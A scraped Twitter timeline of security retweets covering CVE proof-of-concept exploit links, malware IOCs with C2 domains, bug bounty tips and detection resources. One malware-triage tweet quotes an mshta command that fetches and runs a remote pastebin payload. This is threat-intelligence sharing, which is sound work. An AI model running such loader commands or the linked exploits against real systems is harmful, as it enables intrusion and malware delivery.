Tweetovi
- Tweetovi, trenutna stranica.
- Tweetovi i odgovori
Blokirali ste korisnika/cu @m4gjz
Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @m4gjz
-
Doanh Nguyen proslijedio/la je Tweet
the citrix offer a tool to check CVE-2019-19781 https://support.citrix.com/article/CTX269180 … if ("[global]") and ("encrypt passwords") and ("name resolve order") in str(response): => if True and True and ("name resolve order") in str(response):


pic.twitter.com/JnojIYdYMh
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Doanh Nguyen proslijedio/la je Tweet
GitHub - mufeedvh/CVE-2019-8449: CVE-2019-8449 Exploit for Jira v2.1 - v8.3.4 -https://github.com/mufeedvh/CVE-2019-8449/ …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Doanh Nguyen proslijedio/la je Tweet
I've spent a whole day on Sigma Focus: Facilitate contributions - New Rule Creation Guide https://github.com/Neo23x0/sigma/wiki/Rule-Creation-Guide … - New colorised test output - New test cases - Rule cleanup (title, date, ids) https://github.com/Neo23x0/sigma/pull/604 … Next step: How-to guide for pull requestspic.twitter.com/5Iy4NSmiEo
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Doanh Nguyen proslijedio/la je Tweet
Some
#bugbounty hunters made over €50.000 in bug bounties with this simple trick.
Thanks for the #BugBountyTip,@rez0__!pic.twitter.com/z9sPFJTNqV
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Doanh Nguyen proslijedio/la je Tweet
#wuhan#malware 逃离武汉.exe 新型冠状病毒肺炎病例全国已5名患者死亡;警惕!!.exe 新型冠状病毒预防通知.exe 双重预防机制.scr 新型冠状病毒感染的肺炎防控工作指挥部令.exe 疫情防控投入.exe 新型冠状病毒预防通知.exe IOC: http://9.wqkwc.cn 202.58.105.80:5073 https://www.virustotal.com/gui/file/e6f0274fe4f0ebc7323ce86d6aceb991ae0242c8d514a1e241cbdfe88921e50d/relations …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Doanh Nguyen proslijedio/la je Tweet
It should be
#CVE-2019-1367 rather than#CVE-2020-0674, and seems targeting#China from#Darkhotel#APT group.https://twitter.com/pjcampbe11/status/1222556092242317315 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Doanh Nguyen proslijedio/la je Tweet
Quick visual on triaging a multi-stage payload starting with a persistent scheduled task launching: mshta http:\\pastebin[.]com\raw\JF0Zjp3g
note: simple backslash URL trick
know: "4D 5A" (MZ)
Result:
#RevengeRAT on https://paste[.]ee/r/OaKTX C2: cugugugu.duckdns[.]orgpic.twitter.com/FCzsRaI9Ve
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Doanh Nguyen proslijedio/la je Tweet
GitHub - Xh4H/Satellian-CVE-2020-7980: PoC script that shows RCE vulnerability over Intellian Satellite controller -https://github.com/Xh4H/Satellian-CVE-2020-7980/ …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Doanh Nguyen proslijedio/la je Tweet
The Attack Range solves two main challenges in development of detections: - quickly build a small pre configured lab infrastructure as close as possible to your production environment - perform attack simulation using Atomic Red Teamhttps://github.com/splunk/attack_range …
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Doanh Nguyen proslijedio/la je Tweet
GitHub - Ibonok/CVE-2020-1611: Juniper Junos Space (CVE-2020-1611) (PoC) -https://github.com/Ibonok/CVE-2020-1611/ …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Doanh Nguyen proslijedio/la je Tweet
#malware#stealer "Dati_Personali_Contatti.exe" FTP: toratoratora.]altervista.]org@JAMESWT_MHT@matte_lodi@James_inthe_box@malwrhunterteam@merlos1977@VK_Intel@vxsh4d0w@Bl4ng3l#DFIR#infosec#cybersecurity#ThreatIntel#threathuntinghttps://app.any.run/tasks/45fa3d27-2f55-44de-914c-f93af54234c9 …Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Doanh Nguyen proslijedio/la je Tweet
Simple checklist to help you deploying the most important areas of the GNU/Linux production systems
#infosec#blueteam#pentest https://github.com/trimstray/linux-hardening-checklist …pic.twitter.com/QXzGbrrVMg
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Doanh Nguyen proslijedio/la je Tweet
#BugBountyTip time: when you see a POST request made with JSON, convert this to XML and test for XXE. You can use "Content-type converter" extension on@Burp_Suite to do achieve this!#bugbountytips#infosec#hacking#pentest#pentesting#bugbounty RT and Follow, book coming!Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Doanh Nguyen proslijedio/la je Tweet
"Iranian
#APT Groups Technique Detection"
[Starter Pack]
by @SOC_Prime Team on Threat Detection Marketplace
:
[LINK]:https://tdm.socprime.com/tdm/info/pa3gjIFydULg/ …
#ThreatHunting#BlueTeam#MITRE#ATTACK#ELK#elastic#elasticsearchpic.twitter.com/krVlFbeVuX
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Doanh Nguyen proslijedio/la je Tweet
Run PowerShell without Powershell.exe — Best tools & techniques
#infosec#pentest#redteamhttps://medium.com/@Bank_Security/how-to-running-powershell-commands-without-powershell-exe-a6a19595f628 …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Doanh Nguyen proslijedio/la je Tweet
From BinDiff to Zero-Day: A Proof of Concept Exploiting CVE-2019-1208 in Internet Explorer
#infosec#pentest#redteam#exploitDev https://blog.trendmicro.com/trendlabs-security-intelligence/from-bindiff-to-zero-day-a-proof-of-concept-exploiting-cve-2019-1208-in-internet-explorer/ …pic.twitter.com/FY5p6hOgCJHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Doanh Nguyen proslijedio/la je TweetHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
Doanh Nguyen proslijedio/la je Tweet
Do patch
#CVE-2020-0601 ASAP to avoid#ChainOfFools attacks. The delicately crafted signed#ransomware with#Microsoft root certificate in our test could pass certificate verification and detection rate drops dramatically afterwards. https://www.virustotal.com/gui/file/d6ab910259c9bc68196aeec3e9ff4864bada22738c02ecf5ada7912ced292d28/detection …pic.twitter.com/D9ApXqiFZC
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Doanh Nguyen proslijedio/la je Tweet
Remember that I've set up a Malware & APT related custom google search engine that can help in cases in which your expression is not specific enough APT & Malware CSE https://cse.google.com/cse?cx=003248445720253387346:turlh5vi4xc … Sources that this CSE uses https://gist.github.com/Neo23x0/c4f40629342769ad0a8f3980942e21d3 …pic.twitter.com/CZIXLUGTU8
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Doanh Nguyen proslijedio/la je Tweet
#APT#KONNI New attack targeting#Russia suspected to be carried out by#Konni.The malicious#macro code drops out backdoor to perform remote control actions. URL: firefox-plug[.]c1[.]biz C2:lookyes[.]c1[.]biz https://www.virustotal.com/gui/file/191ad44dd48305293ecb547c1712fcd1cd009382bb3a1526595da6aa55f29488 …pic.twitter.com/3ZsitJx2ac
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.